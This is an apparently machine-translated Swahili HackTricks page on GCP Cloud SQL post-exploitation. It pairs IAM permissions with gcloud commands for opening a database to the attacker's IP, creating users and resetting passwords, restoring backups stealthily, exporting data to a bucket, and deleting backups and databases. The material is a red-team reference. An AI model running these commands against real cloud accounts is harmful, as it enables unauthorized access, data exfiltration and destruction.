GCP - Cloud SQL Post Exploitation

Jifunze na zoezi la Udukuzi wa AWS:Mafunzo ya HackTricks AWS Timu Nyekundu Mtaalam (ARTE) Jifunze na zoezi la Udukuzi wa GCP: Mafunzo ya HackTricks GCP Timu Nyekundu Mtaalam (GRTE)

unga mkono HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

Cloud SQL

Kwa habari zaidi kuhusu Cloud SQL angalia:

GCP - Cloud SQL Enum

`cloudsql.instances.update`, ( `cloudsql.instances.get`)

Kuunganisha kwenye mifumo ya database unahitaji tu kupata upatikanaji wa bandari ya database na kujua jina la mtumiaji na nywila, hakuna mahitaji ya IAM. Hivyo, njia rahisi ya kupata upatikanaji, ikidhani kwamba database ina anwani ya IP ya umma, ni kusasisha mitandao iliyoruhusiwa na kuruhusu anwani yako ya IP kupata.

# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
--authorized-networks "$(curl ifconfig.me)" \
--assign-ip \
--quiet

mysql -h <ip_db> # If mysql

# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet

Pia niwezekana kutumia --no-backup kudhoofisha nakala rudufu za database.

Kwa kuwa hizi ni mahitaji sijui kabisa ni ruhusa gani cloudsql.instances.connect na cloudsql.instances.login zinahitajika. Ikiwa unajua, tuma PR!

`cloudsql.users.list`

Pata orodha ya watumiaji wote wa database:

gcloud sql users list --instance <intance-name>

`cloudsql.users.create`

Kibali hiki huruhusu kuunda mtumiaji mpya ndani ya database:

gcloud sql users create <username> --instance <instance-name> --password <password>

`cloudsql.users.update`

Haki hii inaruhusu kuboresha mtumiaji ndani ya database. Kwa mfano, unaweza kubadilisha nenosiri lake:

gcloud sql users set-password <username> --instance <instance-name> --password <password>

`cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`

Nakala za akiba zinaweza kuwa na habari nyeti za zamani, hivyo ni muhimu kuzichunguza. Rejesha nakala rudufu ndani ya database:

gcloud sql backups restore <backup-id> --restore-instance <instance-id>

Kufanya hivyo kwa njia ya siri zaidi ni vyema kuunda kipengee kipya cha SQL na kurejesha data hapo badala ya kwenye mabadiliko yanayoendelea ya hivi sasa.

`cloudsql.backupRuns.delete`

Ruhusa hii inaruhusu kufuta nakala za akiba:

gcloud sql backups delete <backup-id> --instance <instance-id>

`cloudsql.instances.export`, `storage.objects.create`

Fanya database kwa Kikombe cha Uhifadhi wa Wingu ili uweze kuiaccess kutoka hapo:

# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName>

`cloudsql.instances.import`, `storage.objects.get`

Ingiza (ficha) database kutoka kwa Cloud Storage Bucket:

# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>

`cloudsql.databases.delete`

Futa database kutoka kwa kifaa cha db:

gcloud sql databases delete <db-name> --instance <instance-id>

Jifunze na zoea AWS Hacking:Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya AWS (ARTE) Jifunze na zoea GCP Hacking: Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya GCP (GRTE)

Support HackTricks

Angalia mpango wa michango!
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousGCP - Cloud Shell Post Exploitation NextGCP - Compute Post Exploitation

Last updated 1 month ago

Cloud SQL

cloudsql.instances.update, ( cloudsql.instances.get)

cloudsql.users.list

cloudsql.users.create

cloudsql.users.update

cloudsql.instances.restoreBackup, cloudsql.backupRuns.get

cloudsql.backupRuns.delete

cloudsql.instances.export, storage.objects.create

cloudsql.instances.import, storage.objects.get

cloudsql.databases.delete